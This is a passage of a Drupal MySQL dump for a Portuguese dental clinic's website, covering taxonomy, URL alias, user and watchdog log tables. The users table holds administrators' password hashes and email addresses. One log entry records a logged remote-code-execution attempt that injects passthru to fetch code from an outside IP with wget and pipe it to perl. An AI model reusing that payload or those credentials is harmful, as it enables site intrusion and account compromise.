INSERT INTO `taxonomy_term_revision__field_logotipo` VALUES ('parcerias',0,8,8,'pt-pt',0,40,'','',350,350),('parcerias',0,9,9,'pt-pt',0,92,'','',362,120),('parcerias',0,10,10,'pt-pt',0,42,'','',170,207),('parcerias',0,11,11,'pt-pt',0,43,'','',247,306),('parcerias',0,12,12,'pt-pt',0,95,'','',1200,630),('parcerias',0,13,13,'pt-pt',0,94,'','',957,484),('parcerias',0,14,14,'pt-pt',0,47,'','',54,96),('parcerias',0,15,15,'pt-pt',0,48,'','',260,163),('parcerias',0,16,16,'pt-pt',0,49,'','',347,269),('parcerias',0,18,18,'pt-pt',0,90,'','',3508,2480),('parcerias',0,19,19,'pt-pt',0,91,'','',496,496),('parcerias',0,20,20,'pt-pt',0,93,'','',1750,457);

--
-- Table structure for table `taxonomy_term_revision__parent`
--

CREATE TABLE `taxonomy_term_revision__parent` (
  `bundle` varchar(128) CHARACTER SET ascii NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance',
  `deleted` tinyint(4) NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted',
  `entity_id` int(10) unsigned NOT NULL COMMENT 'The entity id this data is attached to',
  `revision_id` int(10) unsigned NOT NULL COMMENT 'The entity revision id this data is attached to',
  `langcode` varchar(32) CHARACTER SET ascii NOT NULL DEFAULT '' COMMENT 'The language code for this data item.',
  `delta` int(10) unsigned NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields',
  `parent_target_id` int(10) unsigned NOT NULL COMMENT 'The ID of the target entity.',
  PRIMARY KEY (`entity_id`,`revision_id`,`deleted`,`delta`,`langcode`),
  KEY `bundle` (`bundle`),
  KEY `revision_id` (`revision_id`),
  KEY `parent_target_id` (`parent_target_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COMMENT='Revision archive storage for taxonomy_term field parent.';

--
-- Dumping data for table `taxonomy_term_revision__parent`
--

INSERT INTO `taxonomy_term_revision__parent` VALUES ('servicos',0,1,1,'pt-pt',0,0),('servicos',0,2,2,'pt-pt',0,0),('servicos',0,3,3,'pt-pt',0,0),('servicos',0,4,4,'pt-pt',0,0),('servicos',0,5,5,'pt-pt',0,0),('servicos',0,6,6,'pt-pt',0,0),('servicos',0,7,7,'pt-pt',0,0),('parcerias',0,8,8,'pt-pt',0,0),('parcerias',0,9,9,'pt-pt',0,0),('parcerias',0,10,10,'pt-pt',0,0),('parcerias',0,11,11,'pt-pt',0,0),('parcerias',0,12,12,'pt-pt',0,0),('parcerias',0,13,13,'pt-pt',0,0),('parcerias',0,14,14,'pt-pt',0,0),('parcerias',0,15,15,'pt-pt',0,0),('parcerias',0,16,16,'pt-pt',0,0),('parcerias',0,18,18,'pt-pt',0,0),('parcerias',0,19,19,'pt-pt',0,0),('parcerias',0,20,20,'pt-pt',0,0),('servicos',0,21,21,'pt-pt',0,0);

--
-- Table structure for table `url_alias`
--

CREATE TABLE `url_alias` (
  `pid` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'A unique path alias identifier.',
  `source` varchar(255) NOT NULL DEFAULT '' COMMENT 'The Drupal path this alias is for. e.g. node/12.',
  `alias` varchar(255) NOT NULL DEFAULT '' COMMENT 'The alias for this path. e.g. title-of-the-story.',
  `langcode` varchar(12) CHARACTER SET ascii NOT NULL DEFAULT '' COMMENT 'The language code this alias is for. if ''und'', the alias will be used for unknown languages. Each Drupal path can have an alias for each supported language.',
  PRIMARY KEY (`pid`),
  KEY `alias_langcode_pid` (`alias`(191),`langcode`,`pid`),
  KEY `source_langcode_pid` (`source`(191),`langcode`,`pid`)
) ENGINE=InnoDB AUTO_INCREMENT=23 DEFAULT CHARSET=utf8mb4 COMMENT='A list of URL aliases for Drupal paths. a user may visit…';

--
-- Dumping data for table `url_alias`
--

INSERT INTO `url_alias` VALUES (1,'/node/2','/clinica-dentaria-do-castelo-0','pt-pt'),(2,'/node/3','/clinica-dentaria-do-castelo','pt-pt'),(3,'/node/4','/servicos','pt-pt'),(4,'/node/5','/conselhos-de-escovagem','pt-pt'),(5,'/node/6','/parcerias-e-acordos','pt-pt'),(6,'/node/7','/contactos','pt-pt'),(7,'/node/8','/noticias','pt-pt'),(8,'/taxonomy/term/1','/servicos/implantologia','pt-pt'),(9,'/taxonomy/term/2','/servicos/branqueamento-dentario','pt-pt'),(10,'/node/13','/termos-e-condicoes','pt-pt'),(11,'/taxonomy/term/3','/servicos/proteses-fixas','pt-pt'),(12,'/taxonomy/term/4','/servicos/ortodontia','pt-pt'),(13,'/taxonomy/term/6','/servicos/restauracoes-esteticas','pt-pt'),(14,'/taxonomy/term/7','/servicos/higiene-oral','pt-pt'),(15,'/taxonomy/term/5','/servicos/odontopediatria','pt-pt'),(21,'/node/29','/noticias/o-nosso-novo-site-esta-online','pt-pt'),(22,'/taxonomy/term/21','/servicos/proteses-removiveis','pt-pt');

--
-- Table structure for table `user__roles`
--

CREATE TABLE `user__roles` (
  `bundle` varchar(128) CHARACTER SET ascii NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance',
  `deleted` tinyint(4) NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted',
  `entity_id` int(10) unsigned NOT NULL COMMENT 'The entity id this data is attached to',
  `revision_id` int(10) unsigned NOT NULL COMMENT 'The entity revision id this data is attached to, which for an unversioned entity type is the same as the entity id',
  `langcode` varchar(32) CHARACTER SET ascii NOT NULL DEFAULT '' COMMENT 'The language code for this data item.',
  `delta` int(10) unsigned NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields',
  `roles_target_id` varchar(255) CHARACTER SET ascii NOT NULL COMMENT 'The ID of the target entity.',
  PRIMARY KEY (`entity_id`,`deleted`,`delta`,`langcode`),
  KEY `bundle` (`bundle`),
  KEY `revision_id` (`revision_id`),
  KEY `roles_target_id` (`roles_target_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COMMENT='Data storage for user field roles.';

--
-- Dumping data for table `user__roles`
--

INSERT INTO `user__roles` VALUES ('user',0,1,1,'en',0,'administrator'),('user',0,8,8,'pt-pt',0,'colaborador');

--
-- Table structure for table `user__user_picture`
--

CREATE TABLE `user__user_picture` (
  `bundle` varchar(128) CHARACTER SET ascii NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance',
  `deleted` tinyint(4) NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted',
  `entity_id` int(10) unsigned NOT NULL COMMENT 'The entity id this data is attached to',
  `revision_id` int(10) unsigned NOT NULL COMMENT 'The entity revision id this data is attached to, which for an unversioned entity type is the same as the entity id',
  `langcode` varchar(32) CHARACTER SET ascii NOT NULL DEFAULT '' COMMENT 'The language code for this data item.',
  `delta` int(10) unsigned NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields',
  `user_picture_target_id` int(10) unsigned NOT NULL COMMENT 'The ID of the file entity.',
  `user_picture_alt` varchar(512) DEFAULT NULL COMMENT 'Alternative image text, for the image''s ''alt'' attribute.',
  `user_picture_title` varchar(1024) DEFAULT NULL COMMENT 'Image title text, for the image''s ''title'' attribute.',
  `user_picture_width` int(10) unsigned DEFAULT NULL COMMENT 'The width of the image in pixels.',
  `user_picture_height` int(10) unsigned DEFAULT NULL COMMENT 'The height of the image in pixels.',
  PRIMARY KEY (`entity_id`,`deleted`,`delta`,`langcode`),
  KEY `bundle` (`bundle`),
  KEY `revision_id` (`revision_id`),
  KEY `user_picture_target_id` (`user_picture_target_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COMMENT='Data storage for user field user_picture.';

--
-- Dumping data for table `user__user_picture`
--


--
-- Table structure for table `users`
--

CREATE TABLE `users` (
  `uid` int(10) unsigned NOT NULL,
  `uuid` varchar(128) CHARACTER SET ascii NOT NULL,
  `langcode` varchar(12) CHARACTER SET ascii NOT NULL,
  PRIMARY KEY (`uid`),
  UNIQUE KEY `user_field__uuid__value` (`uuid`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COMMENT='The base table for user entities.';

--
-- Dumping data for table `users`
--

INSERT INTO `users` VALUES (0,'2893f179-fddd-41e5-b4d6-ca1fe7d5f606','en'),(1,'ae373e54-6bdb-4458-b61a-64ef6491d95b','en'),(8,'00887685-4a12-4b3b-8b0b-454808ed0b9a','pt-pt');

--
-- Table structure for table `users_data`
--

CREATE TABLE `users_data` (
  `uid` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'The users.uid this record affects.',
  `module` varchar(50) CHARACTER SET ascii NOT NULL DEFAULT '' COMMENT 'The name of the module declaring the variable.',
  `name` varchar(128) CHARACTER SET ascii NOT NULL DEFAULT '' COMMENT 'The identifier of the data.',
  `value` longblob COMMENT 'The value.',
  `serialized` tinyint(3) unsigned DEFAULT '0' COMMENT 'Whether value is serialized.',
  PRIMARY KEY (`uid`,`module`,`name`),
  KEY `module` (`module`),
  KEY `name` (`name`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COMMENT='Stores module data as key/value pairs per user.';

--
-- Dumping data for table `users_data`
--

INSERT INTO `users_data` VALUES (8,'contact','enabled',_binary '0',0);

--
-- Table structure for table `users_field_data`
--

CREATE TABLE `users_field_data` (
  `uid` int(10) unsigned NOT NULL,
  `langcode` varchar(12) CHARACTER SET ascii NOT NULL,
  `preferred_langcode` varchar(12) CHARACTER SET ascii DEFAULT NULL,
  `preferred_admin_langcode` varchar(12) CHARACTER SET ascii DEFAULT NULL,
  `name` varchar(60) NOT NULL,
  `pass` varchar(255) DEFAULT NULL,
  `mail` varchar(254) DEFAULT NULL,
  `timezone` varchar(32) DEFAULT NULL,
  `status` tinyint(4) DEFAULT NULL,
  `created` int(11) NOT NULL,
  `changed` int(11) DEFAULT NULL,
  `access` int(11) NOT NULL,
  `login` int(11) DEFAULT NULL,
  `init` varchar(254) DEFAULT NULL,
  `default_langcode` tinyint(4) NOT NULL,
  PRIMARY KEY (`uid`,`langcode`),
  UNIQUE KEY `user__name` (`name`,`langcode`),
  KEY `user__id__default_langcode__langcode` (`uid`,`default_langcode`,`langcode`),
  KEY `user_field__mail` (`mail`(191)),
  KEY `user_field__created` (`created`),
  KEY `user_field__access` (`access`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COMMENT='The data table for user entities.';

--
-- Dumping data for table `users_field_data`
--

INSERT INTO `users_field_data` VALUES (0,'en','en',NULL,'',NULL,NULL,'',0,1557495619,1557495619,0,0,NULL,1),(1,'en','en',NULL,'admin','$S$EH5QGW6E15Jski/u5fy9ImOhq2yIPPz0zVYJpvRg/PVNf5y76B6x','pmctenreiro@gmail.com','Europe/Lisbon',1,1557495619,1557495716,1579256098,1578481101,'pmctenreiro@gmail.com',1),(8,'pt-pt','pt-pt','pt-pt','adminclident','$S$EjO8WBrmBjBVWRx1TzePmIP0beEQ/L5aMPydPhjtIMSySO8H0Iys','clidentcastelo@gmail.com','Europe/Lisbon',1,1563553460,1565565004,1580490194,1578495037,'clidentcastelo@gmail.com',1);

--
-- Table structure for table `watchdog`
--

CREATE TABLE `watchdog` (
  `wid` int(11) NOT NULL AUTO_INCREMENT COMMENT 'Primary Key: Unique watchdog event ID.',
  `uid` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'The users.uid of the user who triggered the event.',
  `type` varchar(64) CHARACTER SET ascii NOT NULL DEFAULT '' COMMENT 'Type of log message, for example "user" or "page not found."',
  `message` longtext NOT NULL COMMENT 'Text of log message to be passed into the t() function.',
  `variables` longblob NOT NULL COMMENT 'Serialized array of variables that match the message string and that is passed into the t() function.',
  `severity` tinyint(3) unsigned NOT NULL DEFAULT '0' COMMENT 'The severity level of the event. ranges from 0 (Emergency) to 7 (Debug)',
  `link` text COMMENT 'Link to view the result of the event.',
  `location` text NOT NULL COMMENT 'URL of the origin of the event.',
  `referer` text COMMENT 'URL of referring page.',
  `hostname` varchar(128) CHARACTER SET ascii NOT NULL DEFAULT '' COMMENT 'Hostname of the user who triggered the event.',
  `timestamp` int(11) NOT NULL DEFAULT '0' COMMENT 'Unix timestamp of when event occurred.',
  PRIMARY KEY (`wid`),
  KEY `type` (`type`),
  KEY `uid` (`uid`),
  KEY `severity` (`severity`)
) ENGINE=InnoDB AUTO_INCREMENT=5387 DEFAULT CHARSET=utf8mb4 COMMENT='Table that contains logs of all system events.';

--
-- Dumping data for table `watchdog`
--

INSERT INTO `watchdog` VALUES (4376,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:5:\"field\";s:16:\"@module_previous\";s:5:\"dblog\";s:5:\"@time\";s:7:\"13.11ms\";}',5,'','http://clidentcastelo.pt/user/register/?q=user%2Fpassword','','217.61.2.187',1580119053),(4377,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:4:\"file\";s:16:\"@module_previous\";s:5:\"field\";s:5:\"@time\";s:6:\"3.35ms\";}',5,'','http://clidentcastelo.pt/user/register/?q=user%2Fpassword','','217.61.2.187',1580119053),(4378,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:7:\"history\";s:16:\"@module_previous\";s:4:\"file\";s:5:\"@time\";s:7:\"17.12ms\";}',5,'','http://clidentcastelo.pt/user/register/?q=user%2Fpassword','','217.61.2.187',1580119053),(4379,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:8:\"honeypot\";s:16:\"@module_previous\";s:7:\"history\";s:5:\"@time\";s:6:\"1.39ms\";}',5,'','http://clidentcastelo.pt/user/register/?q=user%2Fpassword','','217.61.2.187',1580119053),(4380,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:6:\"locale\";s:16:\"@module_previous\";s:8:\"honeypot\";s:5:\"@time\";s:5:\"3.1ms\";}',5,'','http://clidentcastelo.pt/user/register/?q=user%2Fpassword','','217.61.2.187',1580119053),(4381,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:4:\"node\";s:16:\"@module_previous\";s:6:\"locale\";s:5:\"@time\";s:6:\"0.65ms\";}',5,'','http://clidentcastelo.pt/user/register/?q=user%2Fpassword','','217.61.2.187',1580119053),(4382,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:6:\"search\";s:16:\"@module_previous\";s:4:\"node\";s:5:\"@time\";s:7:\"11.64ms\";}',5,'','http://clidentcastelo.pt/user/register/?q=user%2Fpassword','','217.61.2.187',1580119053),(4383,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:6:\"system\";s:16:\"@module_previous\";s:6:\"search\";s:5:\"@time\";s:7:\"23.64ms\";}',5,'','http://clidentcastelo.pt/user/register/?q=user%2Fpassword','','217.61.2.187',1580119053),(4384,0,'cron','Execution of @module_previous_cron() took @time.',_binary 'a:2:{s:16:\"@module_previous\";s:6:\"system\";s:5:\"@time\";s:7:\"58.19ms\";}',5,'','http://clidentcastelo.pt/user/register/?q=user%2Fpassword','','217.61.2.187',1580119053),(4385,0,'cron','Cron run completed.',_binary 'a:0:{}',5,'','http://clidentcastelo.pt/user/register/?q=user%2Fpassword','','217.61.2.187',1580119053),(4386,0,'page not found','@uri',_binary 'a:1:{s:4:\"@uri\";s:60:\"/pt/ms/ms/proteses-dentarias-4700-311-braga/ms-90047454-p-3/\";}',4,'','http://clidentcastelo.pt/pt/ms/ms/proteses-dentarias-4700-311-braga/ms-90047454-p-3/','','40.77.167.25',1580147351),(4387,0,'cron','Starting execution of @module_cron().',_binary 'a:1:{s:7:\"@module\";s:7:\"comment\";}',5,'','http://clidentcastelo.pt/pt/ms/ms/proteses-dentarias-4700-311-braga/ms-90047454-p-3/','','40.77.167.25',1580147352),(4388,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:5:\"dblog\";s:16:\"@module_previous\";s:7:\"comment\";s:5:\"@time\";s:5:\"7.6ms\";}',5,'','http://clidentcastelo.pt/pt/ms/ms/proteses-dentarias-4700-311-braga/ms-90047454-p-3/','','40.77.167.25',1580147352),(4389,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:5:\"field\";s:16:\"@module_previous\";s:5:\"dblog\";s:5:\"@time\";s:6:\"10.8ms\";}',5,'','http://clidentcastelo.pt/pt/ms/ms/proteses-dentarias-4700-311-braga/ms-90047454-p-3/','','40.77.167.25',1580147352),(4390,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:4:\"file\";s:16:\"@module_previous\";s:5:\"field\";s:5:\"@time\";s:6:\"1.84ms\";}',5,'','http://clidentcastelo.pt/pt/ms/ms/proteses-dentarias-4700-311-braga/ms-90047454-p-3/','','40.77.167.25',1580147352),(4391,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:7:\"history\";s:16:\"@module_previous\";s:4:\"file\";s:5:\"@time\";s:7:\"22.67ms\";}',5,'','http://clidentcastelo.pt/pt/ms/ms/proteses-dentarias-4700-311-braga/ms-90047454-p-3/','','40.77.167.25',1580147352),(4392,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:8:\"honeypot\";s:16:\"@module_previous\";s:7:\"history\";s:5:\"@time\";s:5:\"1.5ms\";}',5,'','http://clidentcastelo.pt/pt/ms/ms/proteses-dentarias-4700-311-braga/ms-90047454-p-3/','','40.77.167.25',1580147352),(4393,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:6:\"locale\";s:16:\"@module_previous\";s:8:\"honeypot\";s:5:\"@time\";s:5:\"2.6ms\";}',5,'','http://clidentcastelo.pt/pt/ms/ms/proteses-dentarias-4700-311-braga/ms-90047454-p-3/','','40.77.167.25',1580147352),(4394,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:4:\"node\";s:16:\"@module_previous\";s:6:\"locale\";s:5:\"@time\";s:6:\"1.08ms\";}',5,'','http://clidentcastelo.pt/pt/ms/ms/proteses-dentarias-4700-311-braga/ms-90047454-p-3/','','40.77.167.25',1580147352),(4395,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:6:\"search\";s:16:\"@module_previous\";s:4:\"node\";s:5:\"@time\";s:7:\"11.87ms\";}',5,'','http://clidentcastelo.pt/pt/ms/ms/proteses-dentarias-4700-311-braga/ms-90047454-p-3/','','40.77.167.25',1580147352),(4396,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:6:\"system\";s:16:\"@module_previous\";s:6:\"search\";s:5:\"@time\";s:6:\"14.5ms\";}',5,'','http://clidentcastelo.pt/pt/ms/ms/proteses-dentarias-4700-311-braga/ms-90047454-p-3/','','40.77.167.25',1580147352),(4397,0,'cron','Execution of @module_previous_cron() took @time.',_binary 'a:2:{s:16:\"@module_previous\";s:6:\"system\";s:5:\"@time\";s:7:\"56.64ms\";}',5,'','http://clidentcastelo.pt/pt/ms/ms/proteses-dentarias-4700-311-braga/ms-90047454-p-3/','','40.77.167.25',1580147352),(4398,0,'cron','Cron run completed.',_binary 'a:0:{}',5,'','http://clidentcastelo.pt/pt/ms/ms/proteses-dentarias-4700-311-braga/ms-90047454-p-3/','','40.77.167.25',1580147352),(4399,0,'page not found','@uri',_binary 'a:1:{s:4:\"@uri\";s:177:\"/ms/view/directions.ajah?siteId=47353&listingId=54183&url=http%253A%252F%252Fclidentcastelo.pt%252Fpt%252Fms%252Fms%252Fservicos-clinicos-4700-311-braga%252Fms-90047454-p-2%252F\";}',4,'','http://clidentcastelo.pt/ms/view/directions.ajah?listingId=54183&siteId=47353&url=http%253A%252F%252Fclidentcastelo.pt%252Fpt%252Fms%252Fms%252Fservicos-clinicos-4700-311-braga%252Fms-90047454-p-2%252F','','216.244.66.249',1580147647),(4400,0,'page not found','@uri',_binary 'a:1:{s:4:\"@uri\";s:131:\"/ms/view/sendEmail.html?listingId=54183&pageId=126566&emailIndex=0&txtHWidgetType=C&url=http%253A%252F%252Fclidentcastelo.pt%252Fpt\";}',4,'','http://www.clidentcastelo.pt/ms/view/sendEmail.html?emailIndex=0&listingId=54183&pageId=126566&txtHWidgetType=C&url=http%253A%252F%252Fclidentcastelo.pt%252Fpt','','216.244.66.249',1580170199),(4401,0,'cron','Starting execution of @module_cron().',_binary 'a:1:{s:7:\"@module\";s:7:\"comment\";}',5,'','http://www.clidentcastelo.pt/ms/view/sendEmail.html?emailIndex=0&listingId=54183&pageId=126566&txtHWidgetType=C&url=http%253A%252F%252Fclidentcastelo.pt%252Fpt','','216.244.66.249',1580170200),(4402,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:5:\"dblog\";s:16:\"@module_previous\";s:7:\"comment\";s:5:\"@time\";s:6:\"5.67ms\";}',5,'','http://www.clidentcastelo.pt/ms/view/sendEmail.html?emailIndex=0&listingId=54183&pageId=126566&txtHWidgetType=C&url=http%253A%252F%252Fclidentcastelo.pt%252Fpt','','216.244.66.249',1580170200),(4403,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:5:\"field\";s:16:\"@module_previous\";s:5:\"dblog\";s:5:\"@time\";s:6:\"9.45ms\";}',5,'','http://www.clidentcastelo.pt/ms/view/sendEmail.html?emailIndex=0&listingId=54183&pageId=126566&txtHWidgetType=C&url=http%253A%252F%252Fclidentcastelo.pt%252Fpt','','216.244.66.249',1580170200),(4404,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:4:\"file\";s:16:\"@module_previous\";s:5:\"field\";s:5:\"@time\";s:6:\"2.05ms\";}',5,'','http://www.clidentcastelo.pt/ms/view/sendEmail.html?emailIndex=0&listingId=54183&pageId=126566&txtHWidgetType=C&url=http%253A%252F%252Fclidentcastelo.pt%252Fpt','','216.244.66.249',1580170200),(4405,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:7:\"history\";s:16:\"@module_previous\";s:4:\"file\";s:5:\"@time\";s:6:\"9.43ms\";}',5,'','http://www.clidentcastelo.pt/ms/view/sendEmail.html?emailIndex=0&listingId=54183&pageId=126566&txtHWidgetType=C&url=http%253A%252F%252Fclidentcastelo.pt%252Fpt','','216.244.66.249',1580170200),(4406,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:8:\"honeypot\";s:16:\"@module_previous\";s:7:\"history\";s:5:\"@time\";s:6:\"1.88ms\";}',5,'','http://www.clidentcastelo.pt/ms/view/sendEmail.html?emailIndex=0&listingId=54183&pageId=126566&txtHWidgetType=C&url=http%253A%252F%252Fclidentcastelo.pt%252Fpt','','216.244.66.249',1580170200),(4407,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:6:\"locale\";s:16:\"@module_previous\";s:8:\"honeypot\";s:5:\"@time\";s:6:\"2.83ms\";}',5,'','http://www.clidentcastelo.pt/ms/view/sendEmail.html?emailIndex=0&listingId=54183&pageId=126566&txtHWidgetType=C&url=http%253A%252F%252Fclidentcastelo.pt%252Fpt','','216.244.66.249',1580170200),(4408,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:4:\"node\";s:16:\"@module_previous\";s:6:\"locale\";s:5:\"@time\";s:6:\"0.85ms\";}',5,'','http://www.clidentcastelo.pt/ms/view/sendEmail.html?emailIndex=0&listingId=54183&pageId=126566&txtHWidgetType=C&url=http%253A%252F%252Fclidentcastelo.pt%252Fpt','','216.244.66.249',1580170200),(4409,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:6:\"search\";s:16:\"@module_previous\";s:4:\"node\";s:5:\"@time\";s:6:\"8.94ms\";}',5,'','http://www.clidentcastelo.pt/ms/view/sendEmail.html?emailIndex=0&listingId=54183&pageId=126566&txtHWidgetType=C&url=http%253A%252F%252Fclidentcastelo.pt%252Fpt','','216.244.66.249',1580170200),(4410,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:6:\"system\";s:16:\"@module_previous\";s:6:\"search\";s:5:\"@time\";s:7:\"12.91ms\";}',5,'','http://www.clidentcastelo.pt/ms/view/sendEmail.html?emailIndex=0&listingId=54183&pageId=126566&txtHWidgetType=C&url=http%253A%252F%252Fclidentcastelo.pt%252Fpt','','216.244.66.249',1580170200),(4411,0,'cron','Execution of @module_previous_cron() took @time.',_binary 'a:2:{s:16:\"@module_previous\";s:6:\"system\";s:5:\"@time\";s:7:\"47.72ms\";}',5,'','http://www.clidentcastelo.pt/ms/view/sendEmail.html?emailIndex=0&listingId=54183&pageId=126566&txtHWidgetType=C&url=http%253A%252F%252Fclidentcastelo.pt%252Fpt','','216.244.66.249',1580170200),(4412,0,'cron','Cron run completed.',_binary 'a:0:{}',5,'','http://www.clidentcastelo.pt/ms/view/sendEmail.html?emailIndex=0&listingId=54183&pageId=126566&txtHWidgetType=C&url=http%253A%252F%252Fclidentcastelo.pt%252Fpt','','216.244.66.249',1580170200),(4413,0,'access denied','@uri',_binary 'a:1:{s:4:\"@uri\";s:156:\"/user/register/?q=user%2Fpassword&name%5B%23post_render%5D%5B%5D=passthru&name%5B%23markup%5D=wget+-qO+-+89.40.126.224%2Fbuh%7Cperl&name%5B%23type%5D=markup\";}',4,'','http://clidentcastelo.pt/user/register/?q=user%2Fpassword','','217.61.2.187',1580200900),(4414,0,'php','%type: @message in %function (line %line of %file) @backtrace_string.',_binary 'a:6:{s:5:\"%type\";s:6:\"Notice\";s:8:\"@message\";O:25:\"Drupal\\Core\\Render\\Markup\":1:{s:9:\"\0*\0string\";s:44:\"Only variables should be passed by reference\";}s:9:\"%function\";s:50:\"Drupal\\support\\Plugin\\Block\\ServicesBlock->build()\";s:5:\"%file\";s:97:\"/var/www/html/clidentcastelo_stg/public/modules/custom/support/src/Plugin/Block/ServicesBlock.php\";s:5:\"%line\";i:21;s:17:\"@backtrace_string\";s:11368:\"#0 /var/www/html/clidentcastelo_stg/public/core/includes/bootstrap.inc(587): _drupal_error_handler_real(8, \'Only variables ...\', \'/var/www/html/c...\', 21, Array)\n#1 /var/www/html/clidentcastelo_stg/public/modules/custom/support/src/Plugin/Block/ServicesBlock.php(21): _drupal_error_handler(8, \'Only variables ...\', \'/var/www/html/c...\', 21, Array)\n#2 /var/www/html/clidentcastelo_stg/public/core/modules/block/src/BlockViewBuilder.php(163): Drupal\\support\\Plugin\\Block\\ServicesBlock->build()\n#3 [internal function]: Drupal\\block\\BlockViewBuilder::preRender(Array)\n#4 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(378): call_user_func(\'Drupal\\\\block\\\\Bl...\', Array)\n#5 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(450): Drupal\\Core\\Render\\Renderer->doRender(Array)\n#6 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#7 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Template/TwigExtension.php(501): Drupal\\Core\\Render\\Renderer->render(Array)\n#8 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_page.html.twig_UlrsFNKuJCnPy7qUT9uMgPnBG/AKdHN00D2rExV4gVnoqYtyzHoo3KnjlNxmL_ggHhDRU.php(357): Drupal\\Core\\Template\\TwigExtension->escapeFilter(Object(Drupal\\Core\\Template\\TwigEnvironment), Array, \'html\', NULL, true)\n#9 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(216): __TwigTemplate_30b4e0a599f9209cfb6fe4fa126868c84e5e4b4e2c409ff4dff2f0a2cd7208fb->block_footer(Array, Array)\n#10 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_page.html.twig_UlrsFNKuJCnPy7qUT9uMgPnBG/AKdHN00D2rExV4gVnoqYtyzHoo3KnjlNxmL_ggHhDRU.php(98): Twig\\Template->displayBlock(\'footer\', Array, Array)\n#11 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(455): __TwigTemplate_30b4e0a599f9209cfb6fe4fa126868c84e5e4b4e2c409ff4dff2f0a2cd7208fb->doDisplay(Array, Array)\n#12 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(422): Twig\\Template->displayWithErrorHandling(Array, Array)\n#13 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(434): Twig\\Template->display(Array)\n#14 /var/www/html/clidentcastelo_stg/public/core/themes/engines/twig/twig.engine(64): Twig\\Template->render(Array)\n#15 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Theme/ThemeManager.php(384): twig_render_template(\'themes/clidentc...\', Array)\n#16 